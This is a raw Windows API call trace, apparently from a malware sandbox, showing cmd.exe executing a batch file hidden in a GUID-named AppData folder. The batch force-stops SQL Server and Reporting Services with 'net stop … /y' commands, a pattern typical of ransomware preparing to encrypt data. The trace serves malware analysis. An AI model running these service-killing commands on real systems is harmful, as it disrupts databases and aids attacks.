(_String1="net", _String2="FTYPE") returned 8 [0200.375] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0200.375] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0200.375] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0200.375] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0200.375] SetErrorMode (uMode=0x0) returned 0x1 [0200.375] GetProcessHeap () returned 0x3e0000 [0200.375] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0200.375] GetProcessHeap () returned 0x3e0000 [0200.375] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0200.376] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.376] GetProcessHeap () returned 0x3e0000 [0200.376] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0200.376] GetProcessHeap () returned 0x3e0000 [0200.376] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0200.376] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.377] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.377] GetLastError () returned 0x2 [0200.377] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.377] GetLastError () returned 0x2 [0200.378] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.378] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.378] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.378] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.379] GetLastError () returned 0x2 [0200.379] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.379] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.379] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.380] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0200.380] SetErrorMode (uMode=0x0) returned 0x1 [0200.380] GetProcessHeap () returned 0x3e0000 [0200.380] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0200.380] GetProcessHeap () returned 0x3e0000 [0200.380] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0200.380] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.380] GetProcessHeap () returned 0x3e0000 [0200.380] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0200.380] GetProcessHeap () returned 0x3e0000 [0200.380] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0200.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.381] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.381] GetLastError () returned 0x2 [0200.382] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.382] GetLastError () returned 0x2 [0200.382] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.382] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0200.383] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0200.383] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.383] GetLastError () returned 0x2 [0200.383] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0200.384] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0200.384] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.384] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0200.384] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0200.384] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0200.385] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0200.385] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQL$SBSMONITORING /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQL$SBSMONITORING /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQL$SBSMONITORING /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xc8, dwThreadId=0x578)) returned 1 [0200.389] CloseHandle (hObject=0x74) returned 1 [0200.389] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0200.389] GetProcessHeap () returned 0x3e0000 [0200.389] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.389] GetEnvironmentStringsW () returned 0x3f8408* [0200.389] GetProcessHeap () returned 0x3e0000 [0200.389] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.389] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.389] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0200.527] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0200.527] CloseHandle (hObject=0x78) returned 1 [0200.527] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0200.527] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0200.527] GetProcessHeap () returned 0x3e0000 [0200.527] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.527] GetEnvironmentStringsW () returned 0x3f8408* [0200.527] GetProcessHeap () returned 0x3e0000 [0200.527] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.528] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.528] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0200.528] GetProcessHeap () returned 0x3e0000 [0200.528] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.528] GetEnvironmentStringsW () returned 0x3f8408* [0200.528] GetProcessHeap () returned 0x3e0000 [0200.528] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.528] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.528] GetProcessHeap () returned 0x3e0000 [0200.528] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0200.528] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0200.528] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.528] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0200.528] _get_osfhandle (_FileHandle=1) returned 0x264 [0200.528] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0200.529] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.529] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0200.529] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0200.529] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0200.529] SetConsoleInputExeNameW () returned 0x1 [0200.529] GetConsoleOutputCP () returned 0x1b5 [0200.529] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0200.529] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0200.530] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0200.530] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.530] SetFilePointer (in: hFile=0x78, lDistanceToMove=3098, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc1a [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0200.530] GetProcessHeap () returned 0x3e0000 [0200.530] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0200.530] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.530] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc1a [0200.531] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xca7, lpOverlapped=0x0) returned 1 [0200.531] SetFilePointer (in: hFile=0x78, lDistanceToMove=3135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc3f [0200.531] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=37, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ReportServer$SYSTEM_BGC /y\r\n ServiceΓÇ¥ /y\r\nures\r\nnded\r\n") returned 37 [0200.531] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.531] GetFileType (hFile=0x78) returned 0x1 [0200.531] _get_osfhandle (_FileHandle=3) returned 0x78 [0200.531] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc3f [0200.531] GetProcessHeap () returned 0x3e0000 [0200.531] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0200.531] GetProcessHeap () returned 0x3e0000 [0200.531] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0200.534] _tell (_FileHandle=3) returned 3135 [0200.534] _close (_FileHandle=3) returned 0 [0200.535] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0200.535] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0200.535] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0200.535] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0200.535] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0200.535] _wcsicmp (_String1="net", _String2="CD") returned 11 [0200.535] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0200.535] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0200.535] _wcsicmp (_String1="net", _String2="REN") returned -4 [0200.535] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0200.535] _wcsicmp (_String1="net", _String2="SET") returned -5 [0200.535] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0200.535] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0200.535] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0200.535] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0200.535] _wcsicmp (_String1="net", _String2="MD") returned 1 [0200.535] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0200.535] _wcsicmp (_String1="net", _String2="RD") returned -4 [0200.535] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0200.535] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0200.535] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0200.535] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0200.535] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0200.535] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0200.535] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0200.535] _wcsicmp (_String1="net", _String2="VER") returned -8 [0200.535] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0200.535] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0200.535] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0200.535] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0200.535] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0200.535] _wcsicmp (_String1="net", _String2="START") returned -5 [0200.535] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0200.535] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0200.535] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0200.535] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0200.535] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0200.536] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0200.536] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0200.536] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0200.536] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0200.536] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0200.536] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0200.536] SetErrorMode (uMode=0x0) returned 0x1 [0200.536] GetProcessHeap () returned 0x3e0000 [0200.536] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0200.536] GetProcessHeap () returned 0x3e0000 [0200.536] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0200.537] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.537] GetProcessHeap () returned 0x3e0000 [0200.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0200.537] GetProcessHeap () returned 0x3e0000 [0200.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0200.537] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.537] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.537] GetLastError () returned 0x2 [0200.538] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.538] GetLastError () returned 0x2 [0200.538] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.539] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.539] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.539] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0200.539] GetLastError () returned 0x2 [0200.540] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0200.540] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0200.540] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.541] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0200.541] SetErrorMode (uMode=0x0) returned 0x1 [0200.541] GetProcessHeap () returned 0x3e0000 [0200.541] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0200.541] GetProcessHeap () returned 0x3e0000 [0200.541] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0200.541] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.541] GetProcessHeap () returned 0x3e0000 [0200.541] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0200.541] GetProcessHeap () returned 0x3e0000 [0200.541] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0200.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.542] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.542] GetLastError () returned 0x2 [0200.543] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.543] GetLastError () returned 0x2 [0200.543] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.543] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0200.543] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0200.544] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0200.544] GetLastError () returned 0x2 [0200.544] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0200.544] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0200.545] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.545] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0200.545] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0200.545] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0200.546] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0200.546] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ReportServer$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ReportServer$SYSTEM_BGC /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ReportServer$SYSTEM_BGC /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x784, dwThreadId=0x7dc)) returned 1 [0200.549] CloseHandle (hObject=0x78) returned 1 [0200.549] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0200.549] GetProcessHeap () returned 0x3e0000 [0200.549] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0200.549] GetEnvironmentStringsW () returned 0x3f8408* [0200.550] GetProcessHeap () returned 0x3e0000 [0200.550] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0200.550] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0200.550] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0200.677] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0200.677] CloseHandle (hObject=0x74) returned 1 [0200.677] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0200.677] SetEnvironmentVariableW (lpName="=ExitCode", 